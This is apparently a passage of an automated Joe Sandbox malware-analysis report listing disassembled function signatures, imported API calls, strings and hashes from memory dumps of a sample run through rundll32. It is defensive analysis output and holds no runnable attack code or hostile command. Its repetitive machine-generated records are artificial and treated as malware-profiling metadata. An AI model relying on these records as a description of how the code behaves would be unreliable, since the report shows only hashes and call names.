                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CC618ED
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: FeaturePresentProcessor
                              • String ID:
                              • API String ID: 2325560087-0
                              • Opcode ID: 823b22c2f26ac6acd9275f20fe4a42edcd4850cca537b97e9de23188bff3a335
                              • Instruction ID: b6278ac51ff36d63763363ea0d7fe057a3247394dfbb6c5cd65aa5e956256d23
                              • Opcode Fuzzy Hash: 823b22c2f26ac6acd9275f20fe4a42edcd4850cca537b97e9de23188bff3a335
                              • Instruction Fuzzy Hash: 69A19DB2A01205CFDB08CF6AC5E579EBBF1FB49315F24A12AD415E7650E7349A41CF50
                              APIs
                              • memcmp.VCRUNTIME140(?,?,00000000), ref: 6CBCCC39
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memcmp
                              • String ID:
                              • API String ID: 1475443563-0
                              • Opcode ID: badcae1696984b9812dbf313ec2e89127bd4d78c79c9cec03cf0393462ece4ed
                              • Instruction ID: 7a3c60479a83ce4c2c81495015388e75f923c6d4788807c74984754db8763835
                              • Opcode Fuzzy Hash: badcae1696984b9812dbf313ec2e89127bd4d78c79c9cec03cf0393462ece4ed
                              • Instruction Fuzzy Hash: 9CF11471F0426A8FDB05DF7DC4902AEB7A2AFEA304F19872AE815B7741D7709D428781
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: http://
                              • API String ID: 0-1121587658
                              • Opcode ID: 699d37413caa1eb6673f0fa27d838cbc2702481b4ffa8543e533cea014e1ce48
                              • Instruction ID: f145a5f896537991104c2dce22caf073cf735ac4f960bb8b9841c5f5b638fbcd
                              • Opcode Fuzzy Hash: 699d37413caa1eb6673f0fa27d838cbc2702481b4ffa8543e533cea014e1ce48
                              • Instruction Fuzzy Hash: A712267460CB458FD754CF2AC090A6ABBE1BF89344F108A2EE4D98BB50E774D949DB42
                              APIs
                              • EncryptMessage.SECUR32(?,00000000,?,00000000), ref: 6CC3EA73
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: EncryptMessage
                              • String ID:
                              • API String ID: 801064719-0
                              • Opcode ID: 6df8db487019d16d208e07550c42c9db929bfdd01abd4094dfa544c9488ee015
                              • Instruction ID: d4bfa1a105921f8a0f97028e35861abc3e2b3b2b6cce6a12c37634a5fd86f71d
                              • Opcode Fuzzy Hash: 6df8db487019d16d208e07550c42c9db929bfdd01abd4094dfa544c9488ee015
                              • Instruction Fuzzy Hash: A76128B16087059FD354CF29D480B9BB7E1BF88318F14892DE5AE87740E775A844CB96
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: UNC\
                              • API String ID: 0-505053535
                              • Opcode ID: d58f443755bce69ebeeb51e0dba0d733de3ef79d70e219aafdf55eb8ec6ee794
                              • Instruction ID: 4ea02e3a8c8decd9c5c4802203467e25c07d45076f3c533d71944f097f7e5a5c
                              • Opcode Fuzzy Hash: d58f443755bce69ebeeb51e0dba0d733de3ef79d70e219aafdf55eb8ec6ee794
                              • Instruction Fuzzy Hash: CFE16AB1D046558FEB04CF9AC4A47BEBBF1AF86318F19C159C4642BAE2E3744949CF90
                              Strings
                              • {invalid syntax}{recursion limit reached}?'for<> ::{closureshim# as mut const ; dyn + unsafe extern ", xrefs: 6CC444E7
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: {invalid syntax}{recursion limit reached}?'for<> ::{closureshim# as mut const ; dyn + unsafe extern "
                              • API String ID: 0-1066123878
                              • Opcode ID: e3fb2fd3f7f08921de641e70e403edfbe6e9327de7d42be22fe162c48e2ce1e6
                              • Instruction ID: 8179366a9e44d0b9eec65af0905750f0e6c8fa46718e06a5f6ce66d0a150c0f4
                              • Opcode Fuzzy Hash: e3fb2fd3f7f08921de641e70e403edfbe6e9327de7d42be22fe162c48e2ce1e6
                              • Instruction Fuzzy Hash: 2491E5B1F042118BEF04CE99D8807AAB7B1BF45718F39C569C919ABF86F731D8058792
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: N@
                              • API String ID: 0-1509896676
                              • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                              • Instruction ID: 4590bd7383b4ecfceca6157ca4dd4c1381756f7bce9cb77f7b5188e0af33872d
                              • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                              • Instruction Fuzzy Hash: DF614C729003158FDB18CF48C484AAEBBF2FF84314F1AC5AED9095B366D7B1A955CB84
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4e727a621d00d13b420eb3f9e2c247164b0b1b2176a63980fb85778219ce7215
                              • Instruction ID: 0ff48e9463f362da2d00663d80c7e9e429e3fbc13992de4ad6f8074887cbe4e5
                              • Opcode Fuzzy Hash: 4e727a621d00d13b420eb3f9e2c247164b0b1b2176a63980fb85778219ce7215
                              • Instruction Fuzzy Hash: 132238303497C06AC319462995E1A7ABBD1CB99308F18895EF9C5CFF47E960AC4AD353
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 03201e0e03f7247301a9f3b9842e29ce0bf10146ca8ad560d00c21ca95526b81
                              • Instruction ID: bf85461256548dd513dce4fea388fae9642751d3f5c6d9c04df344186edf765c
                              • Opcode Fuzzy Hash: 03201e0e03f7247301a9f3b9842e29ce0bf10146ca8ad560d00c21ca95526b81
                              • Instruction Fuzzy Hash: 14226277E5151A8BDB08CA95CC515D9B3E3BBC8314B1F9129C819E3305EE79BA478BC0
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memcmpmemmovememset
                              • String ID:
                              • API String ID: 3819852886-0
                              • Opcode ID: d10e5ff6e179efe6450e7f5fb2321c7a6a1267a6dccef899b8370cb85041ab11
                              • Instruction ID: 8a42b1241f2ac05454cd13958db411483246c199db1653ba5dd563e043147a1c
                              • Opcode Fuzzy Hash: d10e5ff6e179efe6450e7f5fb2321c7a6a1267a6dccef899b8370cb85041ab11
                              • Instruction Fuzzy Hash: 5A125D756087818FC724CF25C490A9BF7E2BFC9354F10891EE9999B750EB70E949CB82
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a18a39034562e4ef56181b6472f78a3d58a52de4784536d304669c9489a0e268
                              • Instruction ID: fd716e50ae1fc95330478c096290ff67302f56a24b71f5906216667f2088ea19
                              • Opcode Fuzzy Hash: a18a39034562e4ef56181b6472f78a3d58a52de4784536d304669c9489a0e268
                              • Instruction Fuzzy Hash: DE2224B0A00B059FDB24DF69C590AAABBF1FF98304F108A6DD95A97755E730B881CB50
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 29778ac0bfa48734dd999e13bb2fa210d01775d564a6223aaadad449832973f3
                              • Instruction ID: 152762c2ee9edb7f55bcab78b8146858ae17556225c544193685b2b462a39436
                              • Opcode Fuzzy Hash: 29778ac0bfa48734dd999e13bb2fa210d01775d564a6223aaadad449832973f3
                              • Instruction Fuzzy Hash: 83A116B6E29BC14BD302963D9802265F794AFE7284F15D71FFDE072992FB21A2818245
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c295dc9c11afd6b5c65f7781790d4adc694948e870fee69878cbf9a93b5ea678
                              • Instruction ID: acb0fedbddc0ad9947356e602eae98edc5f94bbca4a5debaa2092fece1c948c0
                              • Opcode Fuzzy Hash: c295dc9c11afd6b5c65f7781790d4adc694948e870fee69878cbf9a93b5ea678
                              • Instruction Fuzzy Hash: E6A18A3160C786DFC714CF19C4C165ABBE2EB89318F15892EE8998BB42D770E945CB92
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3093d92d4e69380833eab5e25978ebbfea2a503336af9cd30574c91dc9b678e5
                              • Instruction ID: 1bc0b3af4147ca549d35f8298d9b405dce1d8629f84dc75afe60cbb49525477c
                              • Opcode Fuzzy Hash: 3093d92d4e69380833eab5e25978ebbfea2a503336af9cd30574c91dc9b678e5
                              • Instruction Fuzzy Hash: F0A16D716093829FC704CF15C09065AFBE2FFC9714F16895EE8998B652D770E986CF82
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7f42a675b156593e3b90c27f80e174efd7fbdb2be8e0add25d80da928f42a92b
                              • Instruction ID: d4accabae6bf5128fae3c657238961b74bacde00b887fc24a46d067a643fa7c2
                              • Opcode Fuzzy Hash: 7f42a675b156593e3b90c27f80e174efd7fbdb2be8e0add25d80da928f42a92b
                              • Instruction Fuzzy Hash: 3C914CB2A087169FD304CF65C48025AF7E2FFC8754F1ACA2EE9999B641C774E8458BC1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a087bbefd7dd493e46dba76d67e5d68281cfcca480f7f23a2a16b940d04f0816
                              • Instruction ID: a34eb088d7296656cc237de6ba74501d70eea4463562ea3bea067350357c86b3
                              • Opcode Fuzzy Hash: a087bbefd7dd493e46dba76d67e5d68281cfcca480f7f23a2a16b940d04f0816
                              • Instruction Fuzzy Hash: E8713AB2E042658FCB04CFA984902EDFFF1AF59300F1AC26ED475AB392E2754546DB90
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f75a8c0f385653d582e7f81774aaeaaece723f219d39d4f48f21a4b1ea3c0790
                              • Instruction ID: 538c46850546e280e2ddb7e05e0223d3df36bf1fc51f412054791b72b6d4e3cd
                              • Opcode Fuzzy Hash: f75a8c0f385653d582e7f81774aaeaaece723f219d39d4f48f21a4b1ea3c0790
                              • Instruction Fuzzy Hash: F071FF76F087159BD308DE65C89035FF7E2EBC8710F1AC83DA899D7784DA7498419B82
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9e5e75635102fd5c4cae7f7c8f902134db88453d4cb4e5063b7c947140e59f36
                              • Instruction ID: 7b0bab0a2728e2e788ad4114dedfed26ace73fcb77e3535435a44fc7bb85f1b5
                              • Opcode Fuzzy Hash: 9e5e75635102fd5c4cae7f7c8f902134db88453d4cb4e5063b7c947140e59f36
                              • Instruction Fuzzy Hash: 5F5170B2F083194BE318EEB5D89035BF2D2EBC8710F0AC93DA999D7784E9B59C4456C1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 99828d06bc808f93db10b0e30e0ebd7fc51d953f3c179bb59066ef1b3e1433ce
                              • Instruction ID: ee1b1321e2bcbd13c7e10ee2196d940f2b11246b0f93d36b17fffc4508ac8d83
                              • Opcode Fuzzy Hash: 99828d06bc808f93db10b0e30e0ebd7fc51d953f3c179bb59066ef1b3e1433ce
                              • Instruction Fuzzy Hash: 61515D72E08B149BD318DE6AC89035FF3E2EFC8310F1AC93DE8D997644C675A8419B81
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 50ca7786af505535b93f7ebbf5f372ed01d22d6b6347e7d5886ace9d1d2504c9
                              • Instruction ID: 495b380decf1c941d47f5d722d62fbfbf032c4773202c2321501a1f1511f8f8d
                              • Opcode Fuzzy Hash: 50ca7786af505535b93f7ebbf5f372ed01d22d6b6347e7d5886ace9d1d2504c9
                              • Instruction Fuzzy Hash: E5516371B0931C4FE308ADB5DD903AFF2D2E7C8710F0A883DA999C7784E9B9994566C1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 97c76fc4d81efcb39dec3207b4a4b37bcf4a361830466e7e062f4cc4ad3e4a54
                              • Instruction ID: a7479c2c457362b490d10dbe1fc1af92be270682906aee733e886c11543af5d2
                              • Opcode Fuzzy Hash: 97c76fc4d81efcb39dec3207b4a4b37bcf4a361830466e7e062f4cc4ad3e4a54
                              • Instruction Fuzzy Hash: 0841CE716083459FD314DF2AC9C071AB7E2AF84314F18C97DEA998BB42F770D8508BA1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 63d273de7ea83eaa8cdb4c9b25e6d59247764ef46f8c646bebec3ab35274763a
                              • Instruction ID: 242f40cfa926873b290998365994def67bb2f0ebd0995ec37df8773c946a0ee2
                              • Opcode Fuzzy Hash: 63d273de7ea83eaa8cdb4c9b25e6d59247764ef46f8c646bebec3ab35274763a
                              • Instruction Fuzzy Hash: 0C41AD326082558FC318DF69C88095EF7E6EBCC650F4A492DE585D7790EB30ED058B86
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f730da10b801ecb4090b3950e3b8df238d33b1381d0c2067e506f8d21231a97d
                              • Instruction ID: bc5f856c923f5bf2771e59dd66742831fa59bdd6f9e2aff72b0e4b16543f68d7
                              • Opcode Fuzzy Hash: f730da10b801ecb4090b3950e3b8df238d33b1381d0c2067e506f8d21231a97d
                              • Instruction Fuzzy Hash: 53213833B006204BCB14C978C8817A6B3D69BC5664F568325ED65AF6D1FB329C9B86D0
                              APIs
                              • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 6CC4C9F0
                              • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 6CC4CA04
                              • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6CC4CA36
                              • GetProcAddress.KERNEL32(SymSetOptions), ref: 6CC4CA64
                              • GetProcAddress.KERNEL32(SymInitializeW), ref: 6CC4CA93
                              • GetCurrentProcess.KERNEL32(SymInitializeW), ref: 6CC4CAB1
                              • memset.VCRUNTIME140(00000000,00000000,000007FE), ref: 6CC4CB04
                              • GetProcAddress.KERNEL32(SymGetSearchPathW), ref: 6CC4CB34
                              • GetCurrentProcess.KERNEL32(SymGetSearchPathW), ref: 6CC4CB48
                              • lstrlenW.KERNEL32(00000002), ref: 6CC4CB5C
                              • memmove.VCRUNTIME140(?,Local\RustBacktraceMutex00000000,00000021), ref: 6CC4CB82
                              • GetCurrentProcessId.KERNEL32 ref: 6CC4CB8A
                              • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 6CC4CC0C
                              • CloseHandle.KERNEL32(00000000), ref: 6CC4CC2B
                              • ReleaseMutex.KERNEL32(00000000), ref: 6CC4CC39
                              • GetProcAddress.KERNEL32(EnumerateLoadedModulesW64), ref: 6CC4CCBC
                              • GetCurrentProcess.KERNEL32(EnumerateLoadedModulesW64), ref: 6CC4CCD0
                              • GetProcAddress.KERNEL32(SymSetSearchPathW), ref: 6CC4CD2E
                              • GetCurrentProcess.KERNEL32(SymSetSearchPathW), ref: 6CC4CD3E
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
